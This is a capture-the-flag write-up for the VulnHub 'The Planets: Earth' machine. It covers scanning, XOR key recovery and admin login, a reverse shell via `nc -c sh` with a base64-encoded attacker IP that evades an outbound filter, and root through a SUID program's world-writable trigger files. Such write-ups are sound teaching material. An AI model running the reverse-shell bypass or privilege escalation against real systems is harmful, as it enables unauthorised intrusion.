The Planets: Earth

Posted by axlfpe on 2025-06-18
Estimated Reading Time 14 Minutes
Words 2.7k In Total

Attacker IP: 192.168.108.50
Target IP: 192.168.108.139

Target: https://www.vulnhub.com/entry/the-planets-earth,755/

Kal ddddx ~ ❯ export ip=192.168.108.139                                                            took 11s at 14:12:52
Kal ddddx ~ ❯ rustscan -a $ip at 14:14:04
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog :
: https://github.com/RustScan/RustScan :
--------------------------------------
Real hackers hack time ⌛

[~] The config file is expected to be at "/home/ddddx/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 192.168.108.139:22
Open 192.168.108.139:80
Open 192.168.108.139:443

The scan finds three open ports: 22, 80 and 443.

Try visiting ports 80 and 443.

Nothing there, and brute-forcing directories turns up nothing either.

Since 443 is open, check the SSL certificate: it reveals the domain earth.local.

Add it to the hosts file and try visiting.

This is a message board with a form; after each submission the message is shown in the <ul> list at the bottom of the page.

Entering some text shows that the message content is displayed on the page encrypted or encoded. Since we are asked to fill in a message key, the likely schemes are:

using message_key for symmetric encryption such as AES, DES or XOR;

concatenating the key into the message as a salt before encrypting;

or using the key directly as a passphrase.

Editing the input and working backwards with a Python script, it turns out to be XOR encryption.

Kal ddddx ~ ❯ cat decode1/XOR.py                                                                          ≡ at 15:47:48
plaintext = b"world"                      # what was typed into the message box
ciphertext = bytes.fromhex("12170a1401")  # what the page displayed for it, as hex
# XOR is its own inverse: ciphertext ^ plaintext yields the key bytes at these positions
key = bytes([c ^ p for c, p in zip(ciphertext, plaintext)])
print("Key:", key)

Kal ddddx ~ ❯ python decode1/XOR.py ≡ at 15:48:04
Key: b'exxxe'

Now that we know the cipher, we want to recover the contents of the earlier messages, so the next step is finding the key. A directory scan turns up an admin directory.

Kal ddddx ~ ❯ dirsearch -u http://earth.local/ -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -e php,txt,html
/home/ddddx/tools/dirsearch/lib/core/installation.py:24: UserWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html. The pkg_resources package is slated for removal as early as 2025-11-30. Refrain from using this package or pin to Setuptools<81.
import pkg_resources

_|. _ _ _ _ _ _|_ v0.4.3
(_||| _) (/_(_|| (_| )

Extensions: php, txt, html | HTTP method: GET | Threads: 25 | Wordlist size: 207628

Target: http://earth.local/

[15:52:25] Scanning:
[15:52:26] 301 - 0B - /admin -> /admin/


There is a login page. Weak passwords and SQL-injection "universal" passwords get nowhere, so let the brute-force run in the background.

Recall that when we inspected the domain earlier there was also a subdomain, terratest.earth.local.

Try directory brute-forcing on the subdomain, over https since that is what the certificate requires.

Kal ddddx ~ ❯ dirb  https://terratest.earth.local/                                               took 11s ≡ at 16:19:08

-----------------
DIRB v2.22
By The Dark Raver
-----------------

START_TIME: Wed Jun 18 16:19:34 2025
URL_BASE: https://terratest.earth.local/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612

---- Scanning URL: https://terratest.earth.local/ ----
+ https://terratest.earth.local/cgi-bin/ (CODE:403|SIZE:199)
+ https://terratest.earth.local/index.html (CODE:200|SIZE:26)
+ https://terratest.earth.local/robots.txt (CODE:200|SIZE:521)

-----------------
END_TIME: Wed Jun 18 16:19:39 2025
DOWNLOADED: 4612 - FOUND: 3

There is a robots.txt listing the file extensions that must not be crawled. Put those common extensions into a wordlist and scan for files named testingnotes; the scan turns up testingnotes.txt.

Kal ddddx ~ ❯ ffuf -w dic.txt -u https://terratest.earth.local/FUZZ -mc all -fc 404                       ≡ at 16:27:58

/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/

v2.1.0-dev
________________________________________________

:: Method : GET
:: URL : https://terratest.earth.local/FUZZ
:: Wordlist : FUZZ: /home/ddddx/dic.txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: all
:: Filter : Response status: 404
________________________________________________

[Status: 200, Size: 26, Words: 4, Lines: 2, Duration: 137ms]
/testingnotes.txt [Status: 200, Size: 546, Words: 82, Lines: 10, Duration: 61ms]
:: Progress: [15/15] :: Job [1/1] :: 0 req/sec :: Duration: [0:00:00] :: Errors: 0 ::

Visiting it shows that the message board's encryption algorithm is given right there. Starting to guess earlier was clearly premature; we should have looked for other hints first rather than trying to reverse the cipher directly. Fortunately it only took a few tries.

Information obtained here:

1. terra is the admin username

2. testdata.txt is used to test the encryption

Visiting testdata.txt shows a block of text. Since it is said to be used to test the encryption, XOR it against the message board content to work backwards. The third message is the longest, so try that one first.

According to radiometric dating estimation and other evidence, Earth formed over 4.5 billion years ago. Within the first billion years of Earth's history, life appeared in the oceans and began to affect Earth's atmosphere and surface, leading to the proliferation of anaerobic and, later, aerobic organisms. Some geological evidence indicates that life may have arisen as early as 4.1 billion years ago.
Kal ddddx ~ ❯ cat decode1/XOR.py                                                                            at 09:47:21
plaintext = b"According to radiometric dating estimation and other evidence, Earth formed over 4.5 billion years ago. Within the first billion years of Earth's history, life appeared in the oceans and began to affect Earth's atmosphere and surface, leading to the proliferation of anaerobic and, later, aerobic organisms. Some geological evidence indicates that life may have arisen as early as 4.1 billion years ago."
ciphertext = bytes.fromhex("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")
key = bytes([c ^ p for c, p in zip(ciphertext, plaintext)])
print("Key:", key)

Kal ddddx ~ ❯ python decode1/XOR.py at 09:47:56
Key: b'earthclimatechangebad4humans'

Successfully recovered the encryption key: earthclimatechangebad4humans

With the key in hand, tried to recover the other two messages, but got nothing useful; so just try this result directly as the login password.
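The key recovery above (the five-byte "world" probe and the long testdata.txt known-plaintext run) is the same XOR relation both times. As an added example, not code from the original post, this takes the page's XOR.py step one stage further: it recovers the key stream from a known message, collapses it to the shortest repeating key, and decrypts a second message under that key. The two board entries are constructed here and encrypted with the page's key; they are not the board's real ciphertexts.

```python
from itertools import cycle

# Key the page recovered from testdata.txt (page value)
PAGE_KEY = b"earthclimatechangebad4humans"

def xor_bytes(data: bytes, key: bytes) -> bytes:
    """Repeating-key XOR; the same call encrypts and decrypts."""
    return bytes(d ^ k for d, k in zip(data, cycle(key)))

def keystream(ciphertext: bytes, known_plaintext: bytes) -> bytes:
    """The known-plaintext step from the page's XOR.py: c ^ p gives the key byte
    at every position where the plaintext is known, and nowhere else."""
    return bytes(c ^ p for c, p in zip(ciphertext, known_plaintext))

def shortest_period(stream: bytes) -> bytes:
    """Collapse a recovered key stream to its shortest repeating unit. A period is
    only accepted when the stream covers it at least twice; a shorter stream (the
    page's five-byte 'world' probe) is returned unchanged, i.e. a key prefix at best."""
    for n in range(1, len(stream) // 2 + 1):
        if all(stream[i] == stream[i % n] for i in range(len(stream))):
            return stream[:n]
    return stream

def recover_key(ciphertext_hex: str, known_plaintext: bytes) -> bytes:
    """Hex as the board displays it, plus the text that was submitted, to the key."""
    return shortest_period(keystream(bytes.fromhex(ciphertext_hex), known_plaintext))

# Constructed sample data: two board entries encrypted under the page's key.
KNOWN_PLAIN = b"Earth formed over 4.5 billion years ago. Within the first billion years of Earth's history"
KNOWN_HEX = xor_bytes(KNOWN_PLAIN, PAGE_KEY).hex()
OTHER_PLAIN = b"Second entry, plaintext unknown to the analyst."
OTHER_HEX = xor_bytes(OTHER_PLAIN, PAGE_KEY).hex()

def decrypt_other(known_hex: str, known_plain: bytes, other_hex: str) -> bytes:
    """Full workflow: key from one known message, then decrypt a second one with it."""
    key = recover_key(known_hex, known_plain)
    return xor_bytes(bytes.fromhex(other_hex), key)
```

The known plaintext must be longer than twice the key for the period collapse to be trustworthy, which is exactly why the 90-byte testdata.txt line worked where the "world" probe could only expose a fragment.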

Login succeeds and the panel allows command execution, so try uploading a shell. The attempt shows a message that remote connections are forbidden; there is probably filtering, or tools such as curl, wget and nc are blocked from reaching external addresses, or use of /dev/tcp and sockets is restricted.

Writing a shell to a file does not work either, so try a bypass. Curiously, running nc or wget by itself does not show the remote-access-forbidden message, and even passing an incomplete IP address does not trigger it; only a complete IP address does. So we can consider transforming the IP address.

nc -c sh $(echo MTkyLjE2OC4xMDguNTAgNDQ0NA== | base64 -d)

(remote) apache@earth:/tmp$ whoami
apache
(remote) apache@earth:/tmp$ id
uid=48(apache) gid=48(apache) groups=48(apache)

We are in. Enumerating the host turns up

/usr/bin/reset_root, which stands out because it is a non-standard SUID binary, not something that belongs on a normal system.

Probably a tool the admin built himself; the name suggests it relates to root, perhaps resetting the root password or switching to the root account.

(remote) apache@earth:/tmp$ find / -perm -4000 -type f 2>/dev/null
/usr/bin/chage
/usr/bin/gpasswd
/usr/bin/newgrp
/usr/bin/su
/usr/bin/mount
/usr/bin/umount
/usr/bin/pkexec
/usr/bin/passwd
/usr/bin/chfn
/usr/bin/chsh
/usr/bin/at
/usr/bin/sudo
/usr/bin/reset_root
/usr/sbin/grub2-set-bootflag
/usr/sbin/pam_timestamp_check
/usr/sbin/unix_chkpwd
/usr/sbin/mount.nfs
/usr/lib/polkit-1/polkit-agent-helper-1

Running it and reading the output, the /usr/bin/reset_root program:

  • is a custom SUID program
  • checks whether certain "triggers" are satisfied before acting
  • performs the "reset root" operation (possibly privilege escalation) only when all triggers are present
(remote) apache@earth:/tmp$ strings /usr/bin/reset_root | grep -iE 'trigger|check|reset|fail|success|flag|root'
als rootH
CHECKING IF RESET TRIGGERS PRESENT...
RESET TRIGGERS ARE PRESENT, RESETTING ROOT PASSWORD TO: Earth
/usr/bin/echo 'root:Earth' | /usr/sbin/chpasswd
RESET FAILED, ALL TRIGGERS ARE NOT PRESENT.
reset_root_3.c

We can see that when the program succeeds it resets root's password to Earth. It does not name the trigger files directly, but it gives an important hint, reset_root_3.c, most likely the source file name. Base64-encode the reset_root binary, copy it over to the local machine, decode it there and open it in IDA.

(remote) apache@earth:/tmp$ base64 /usr/bin/reset_root > /tmp/reset_root.b64
(remote) apache@earth:/tmp$ cat /tmp/reset_root.b64
Kal ddddx ~ ❯ base64 -d reset_root.b64 > reset_root took 6s at 14:37:10
Kal ddddx ~ ❯ chmod +x reset_root at 14:37:38
Kal ddddx ~ ❯ explorer.exe .
int __cdecl main(int argc, const char **argv, const char **envp)
{
  __int64 v4; // [sp+3h] [bp-10BDh]@1
  int v5; // [sp+Bh] [bp-10B5h]@1
  char v6; // [sp+Fh] [bp-10B1h]@1
  __int64 v7; // [sp+10h] [bp-10B0h]@1
  __int64 v8; // [sp+18h] [bp-10A8h]@1
  char v9; // [sp+20h] [bp-10A0h]@1
  __int64 v10; // [sp+30h] [bp-1090h]@1
  __int64 v11; // [sp+38h] [bp-1088h]@1
  char v12; // [sp+40h] [bp-1080h]@1
  char name; // [sp+50h] [bp-1070h]@1
  char v14; // [sp+5Dh] [bp-1063h]@5
  char v15; // [sp+61h] [bp-105Fh]@1
  __int64 v16; // [sp+1050h] [bp-70h]@1
  __int64 v17; // [sp+1058h] [bp-68h]@1
  __int64 v18; // [sp+1060h] [bp-60h]@1
  __int64 v19; // [sp+1068h] [bp-58h]@1
  char v20; // [sp+1070h] [bp-50h]@1
  char v21; // [sp+1081h] [bp-3Fh]@1
  __int64 v22; // [sp+1090h] [bp-30h]@1
  __int64 v23; // [sp+1098h] [bp-28h]@1
  char v24; // [sp+10A0h] [bp-20h]@1
  __int64 v25; // [sp+10B0h] [bp-10h]@1
  int v26; // [sp+10B8h] [bp-8h]@1
  int v27; // [sp+10BCh] [bp-4h]@1

  v25 = 7310868739970064752LL;
  v26 = 7630692;
  v22 = 580991899969063172LL;
  v23 = 6150893463313718533LL;
  v24 = 94;
  v16 = 7598819853035991651LL;
  v17 = 8390047166775913569LL;
  v18 = 8390876006426637370LL;
  v19 = 32758215501637992LL;
  v27 = 0;
  v10 = 3666059865361499LL;
  v11 = 175771437991860558LL;
  v12 = 117;
  v7 = 3666059865361499LL;
  v8 = 7061757497007482958LL;
  v9 = 7;
  v4 = 2307565132488121435LL;
  v5 = 453453137;
  v6 = 0;
  magic_cipher(&v22, &v25, &v20, 17LL, 12LL);
  v21 = 0;
  puts("CHECKING IF RESET TRIGGERS PRESENT...");
  magic_cipher(&v10, &v20, &name, 17LL, 18LL);
  v15 = 0;
  if ( !access(&name, 0) )
    ++v27;
  magic_cipher(&v7, &v20, &name, 17LL, 18LL);
  v15 = 0;
  if ( !access(&name, 0) )
    ++v27;
  magic_cipher(&v4, &v20, &name, 13LL, 18LL);
  v14 = 0;
  if ( !access(&name, 0) )
    ++v27;
  if ( v27 == 3 )
  {
    puts("RESET TRIGGERS ARE PRESENT, RESETTING ROOT PASSWORD TO: Earth");
    setuid(0);
    system("/usr/bin/echo 'root:Earth' | /usr/sbin/chpasswd");
  }
  else
  {
    puts("RESET FAILED, ALL TRIGGERS ARE NOT PRESENT.");
  }
  return 0;
}
magic_cipher(&v10, &v20, &name, 17LL, 18LL);
if ( !access(&name, 0) ) ++v27;

magic_cipher(&v7, &v20, &name, 17LL, 18LL);
if ( !access(&name, 0) ) ++v27;

magic_cipher(&v4, &v20, &name, 13LL, 18LL);
if ( !access(&name, 0) ) ++v27;

So three path names are decrypted by magic_cipher(...) into name, and each is then checked for existence. Only if:

if (v27 == 3)

that is, all three files exist, does it perform the privilege escalation. Use strace to dynamically trace which file paths /usr/bin/reset_root accesses, create them, run it successfully and get the flag.

Kal ddddx ~ ❯ strace ~/reset_root 2>&1 | grep -iE 'open|access|stat'                                  ✔ 1|0 at 15:09:51
access("/etc/ld.so.preload", R_OK) = -1 ENOENT (No such file or directory)
openat(AT_FDCWD, "/etc/ld.so.cache", O_RDONLY|O_CLOEXEC) = 3
fstat(3, {st_mode=S_IFREG|0644, st_size=98218, ...}) = 0
openat(AT_FDCWD, "/lib/x86_64-linux-gnu/libc.so.6", O_RDONLY|O_CLOEXEC) = 3
fstat(3, {st_mode=S_IFREG|0755, st_size=2003408, ...}) = 0
fstat(1, {st_mode=S_IFIFO|0600, st_size=0, ...}) = 0
access("/dev/shm/kHgTFI5G", F_OK) = -1 ENOENT (No such file or directory)
access("/dev/shm/Zw7bV9U5", F_OK) = -1 ENOENT (No such file or directory)
access("/tmp/kcM0Wewe", F_OK) = -1 ENOENT (No such file or directory)
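The check strace exposes boils down to three access(path, F_OK) existence tests on names under /tmp and /dev/shm, directories every local user can write to. As an added illustration, not the page's or the binary's code, here is that weak check next to the kind of ownership and permission check an SUID tool should make instead, exercised in a constructed scratch directory standing in for /tmp and /dev/shm. The trigger file names are the ones strace revealed; the required owner uid is a parameter so the demo behaves the same whoever runs it.

```python
import os
import stat
import tempfile

# Trigger file names strace revealed on the page (page values)
TRIGGERS = ["/dev/shm/kHgTFI5G", "/dev/shm/Zw7bV9U5", "/tmp/kcM0Wewe"]

def triggers_present_weak(paths):
    """What reset_root does: access(path, F_OK) per path, success when all three exist.
    Existence alone is satisfied by a plain touch in a world-writable directory."""
    return sum(1 for p in paths if os.access(p, os.F_OK)) == len(paths)

def trigger_is_trusted(path, required_uid):
    """Hardened variant (added here): the trigger must be a regular file (lstat, so a
    symlink does not count), owned by the expected uid, and not group/world writable."""
    try:
        st = os.lstat(path)
    except FileNotFoundError:
        return False
    if not stat.S_ISREG(st.st_mode):
        return False
    if st.st_uid != required_uid:
        return False
    return not (st.st_mode & (stat.S_IWGRP | stat.S_IWOTH))

def triggers_present_hardened(paths, required_uid):
    return all(trigger_is_trusted(p, required_uid) for p in paths)

def demo():
    """Constructed scenario: the three trigger names are touched by an ordinary user in a
    scratch directory. Returns the verdict of each check so they can be compared."""
    with tempfile.TemporaryDirectory() as scratch:
        paths = [os.path.join(scratch, os.path.basename(t)) for t in TRIGGERS]
        for p in paths:
            open(p, "w").close()
            os.chmod(p, 0o644)  # what a plain touch normally leaves behind
        me = os.getuid()
        results = {
            "weak_existence_only": triggers_present_weak(paths),            # passes: the page's outcome
            "hardened_owner_mismatch": triggers_present_hardened(paths, me + 1),  # fails: not the trusted owner
            "hardened_owner_matches": triggers_present_hardened(paths, me),       # passes: only the real owner can
        }
        os.chmod(paths[0], 0o666)  # now anyone could have planted or altered it
        results["hardened_world_writable"] = triggers_present_hardened(paths, me)
        return results
```

Even the hardened check still races against a writable parent directory, so the real fix is to keep trigger state somewhere only root can write, not under /tmp or /dev/shm at all.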
(remote) apache@earth:/tmp$ touch /dev/shm/kHgTFI5G
(remote) apache@earth:/tmp$ touch /dev/shm/Zw7bV9U5
(remote) apache@earth:/tmp$ touch /tmp/kcM0Wewe
(remote) apache@earth:/tmp$ /usr/bin/reset_root
CHECKING IF RESET TRIGGERS PRESENT...
RESET TRIGGERS ARE PRESENT, RESETTING ROOT PASSWORD TO: Earth
(remote) apache@earth:/tmp$ su root
Password:
(remote) root@earth:/tmp# cd /root
(remote) root@earth:/root# ls
anaconda-ks.cfg root_flag.txt
(remote) root@earth:/root# cat root_flag.txt

_-o#&&*''''?d:>b\_
_o/"`'' '',, dMF9MMMMMHo_
.o&#' `"MbHMMMMMMMMMMMHo.
.o"" ' vodM*$&&HMMMMMMMMMM?.
,' $M&ood,~'`(&##MMMMMMH\
/ ,MMMMMMM#b?#bobMMMMHMMML
& ?MMMMMMMMMMMMMMMMM7MMM$R*Hk
?$. :MMMMMMMMMMMMMMMMMMM/HMMM|`*L
| |MMMMMMMMMMMMMMMMMMMMbMH' T,
$H#: `*MMMMMMMMMMMMMMMMMMMMb#}' `?
]MMH# ""*""""*#MMMMMMMMMMMMM' -
MMMMMb_ |MMMMMMMMMMMP' :
HMMMMMMMHo `MMMMMMMMMT .
?MMMMMMMMP 9MMMMMMMM} -
-?MMMMMMM |MMMMMMMMM?,d- '
:|MMMMMM- `MMMMMMMT .M|. :
.9MMM[ &MMMMM*' `' .
:9MMk `MMM#" -
&M} ` .-
`&. .
`~, . ./
. _ .-
'`--._,dd###pp=""'

Congratulations on completing Earth!
If you have any feedback please contact me at SirFlash@protonmail.com
[root_flag_b0da9554d29db2117b02aa8b66ec492e]
